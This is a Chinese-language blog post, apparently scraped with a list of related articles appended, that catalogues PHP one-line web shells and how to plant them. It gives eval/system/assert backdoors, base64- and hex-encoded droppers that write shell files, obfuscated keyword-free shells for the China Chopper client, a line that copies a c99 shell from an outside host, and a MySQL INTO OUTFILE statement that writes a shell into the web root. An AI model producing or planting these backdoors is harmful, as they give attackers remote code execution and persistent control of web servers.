mysql写php木马_PHP一句话木马小总结与SQL语句写一句话木马
一、基础类的一句话--功能仅限于验证漏洞了,实际中太容易被查出出来:
1 <?php @eval($_GET["code"])?>
2 <?php @system($_POST["cmd"])?>
相信一目了然可以看懂如何使用这类一句话。
二、编码的替换的类型:
1 <?php @fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));?>
2 //会生成<?php @eval($_POST['lostwolf']);?>
3
4
5 //php在html内部的一种嵌入方式
6
7 <?php fputs (fopen(pack("H*","6c6f7374776f6c662e706870"),"w"),pack("H*","3c3f406576616c28245f504f53545b6c6f7374776f6c665d293f3e"))?>
8
9
10 <?php
11 session_start();
12 $_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
13 $_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');?>
三、乱七八糟类型的:
1 <?php $_GET[a]($_GET[b]);?>
2 //?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
3 <?php assert($_REQUEST["c"]);?> //菜刀连接 躲避检测 密码c
4 <?php substr(md5($_REQUEST['x']),28)=='acd0'&&eval($_REQUEST['c']);?>
5 //菜刀提交 http://192.168.1.5/x.php?x=lostwolf 脚本类型:php 密码为 c
四、下载类型的:
1 <?php echo copy("http://www.r57.me/c99.txt","lostwolf.php"); ?>
2
3 echo file_get_contents("..//cfg_database.php");?> //显示某文件
4
5 eval ( file_get_contents("远程shell")) ?> //运行远程shell
五、无关键函数类型:
1 <?php
2 $_="";
3 $_[+""]='';
4 $_="$_"."";
5 $_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
6 ?>
7 <?php ${'_'.$_}['_'](${'_'.$_}['__']);?>
8 http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass
9
10 $_="";$_[+""]='_';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>
六、补充知识点:
SQL写一句话(MySQL)
1 select "<?php @system($_POST["cmd"]);?>" into outfile "/home/webaccount/projectname/www/*.php"
2 #前面是一句话内容 后面是绝对路径www下的PHP文件,同理其他脚本也可以
mysql写php木马_PHP一句话木马小总结与SQL语句写一句话木马相关推荐
- mysql 去掉前面的0_去掉前面的0的sql语句(前导零,零前缀)
去掉前面的0的sql语句(前导零,零前缀) 原来sql还有个stuff的函数,很强悍. 一个列的格式是单引号后面跟着4位的数字,比如'0003,'0120,'4333,我要转换成3,120,4333这 ...
- 渗透之——SQL语句生成一句话
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85296880 1.SQLServer执行SQL语句生成一句话 select '& ...
- 数据库创建(利用写好的数据库表生成创建表的sql语句+利用生成的数据库创建表加同步数据sql)
一.利用写好的数据库表生成创建表的sql语句 1.简单创建一个数据库,并建一个表,并编辑数据. a.建库 b.建表 c.编辑表,保存时输入表名 d.刷新一下,出来了 e.转存导出sql文件. 二.利用 ...
- mysql 下 计算 两点 经纬度 之间的距离 含具体sql语句
mysql取字段逗号分隔的第一个 cover字段为:(admin/LUpiEMD1Pk6U6B,admin/LUpiEMD1Pk6U6B,admin/LUpiEMD1Pk6U6B) 取逗号分隔第一个词 ...
- mysql 索引巧用,SQL语句写得忒野了
今天来分享几个MySQL常见的SQL错误**(不当)用法.我们在作为一个初学者时,很有可能自己在写SQL时也没有注意到这些问题,导致写出来的SQL语句效率低下,所以我们也可以自省自检一下. 1. LI ...
- MySQL面试2:一张学生表,一张教师表,里面都有Name和Code,写出张三的老师有多少名学生的SQL语句。
在Mysql面试的写SQL语句环节中,有人曾碰到了这样一道这样的一道SQL语句题.目前有两张数据表,一张学生,一张老师表.里面都有Name和Code两个字段.求出张三的老师一共有多少名学生. 这样,我 ...
- 易语言mysql表新增防止重复_sqlite数据库 大量插入数据时如何避免重复插入(易语言,做好用sql语句写下)...
就是你在建数据表的时候就用上面的代码写到表里面,以后直接插入就行了啊 看来你还是不懂.. 给你个样例吧.. 源码如下;测试成功 .版本 2 .支持库 sqlite3 .支持库 spec .子程序 _ ...
- mysql写出总分最高的学生姓名_编写SQL语句查询出每个各科班分数最高的同学的名字,班级名称,课程名称,分数...
这个问题是在csdn上一位朋友写的,但是答案有点复杂,而且查询使用的效率也不是很好,于是自己也写了一个.以下是表结构和数据, 有以下两张表, Class表 classid classname 1 高三 ...
- sql exists用法_新同事不讲武德,这SQL语句写得忒野了
来源 | developer.aliyun.com/article/72501今天来分享几个MySQL常见的SQL错误(不当)用法.我们在作为一个初学者时,很有可能自己在写SQL时也没有注意到这些问题 ...
最新文章
- 网站推广——网站推广专员如何提升新站权重?
- 多线程七种执行的状态
- 7360清零方法_兄弟、联想、美能达、富士施乐全系列打印机加粉清零方法
- XSS跨站脚本(web应用)——XSS相关工具及使用(四)
- TZOJ--5480: 孤衾易暖 // POJ--3735 Training little cats (矩阵快速幂)
- Java创建型模式的讨论
- 【Python】Python3.7.3 - 闭包Closure技术
- 【牛客网】——字符串的旋转
- C++开发工程师的薪资和未来发展
- IE和火狐CSS透明层兼容写法
- 课程设计之第二次冲刺----第一天
- 多媒体网络计算机室标准,10校园网、计算机教室、多媒体教室建设标准试行.docx...
- 谷歌浏览器批量图片下载插件-合成pdf
- VS2010过期密钥
- Java案例2-1 商品入库
- 软件测试风险管理包含哪两方面,软件测试风险的应对措施通常包括哪几类
- 小刘同学的第一百三十一篇博文
- oracle的解除锁表
- 下载安装cygwin/X
- 掌握云服务器使用的基本方法